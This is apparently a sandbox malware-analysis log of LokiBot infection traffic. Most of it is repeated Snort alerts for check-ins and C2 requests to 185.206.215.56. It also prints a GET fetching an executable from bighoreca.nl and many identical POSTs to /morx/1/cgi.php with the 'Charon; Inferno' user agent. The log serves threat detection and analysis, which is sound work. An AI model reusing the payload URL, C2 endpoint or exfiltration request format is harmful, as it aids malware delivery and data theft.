Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49249 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49249 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49249
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49250 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49250 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49250 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49250 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49250
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49251 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49251 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49251 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49251 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49251
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49252 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49252 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49252 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49252 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49252
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49253 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49253 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49253 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49253 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49253
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49254 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49254 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49254 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49254 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49254
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49255 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49255 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49255 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49255 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49255
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49256 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49256 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49256 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49256 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49256
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49257 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49257 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49257 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49257 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49257
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49258 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49258 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49258 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49258 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49258
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49259 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49259 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49259 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49259 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49259
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49260 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49260 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49260 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49260 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49260
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49261 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49261 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49261 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49261 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49261
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49262 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49262 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49262 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49262 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49262
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49263 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49263 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49263 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49263 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49263
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49264 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49264 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49264 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49264 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49264
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49265 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49265 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49265 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49265 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49265
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49266 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49266 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49266 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49266 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49266
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49267 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49267 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49267 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49267 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49267
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49268 -> 185.206.215.56:80
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wp-content/themes/index/QPR-3067.exe HTTP/1.1Host: bighoreca.nlConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.22.0.232 104.22.0.232
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 176Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 176Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
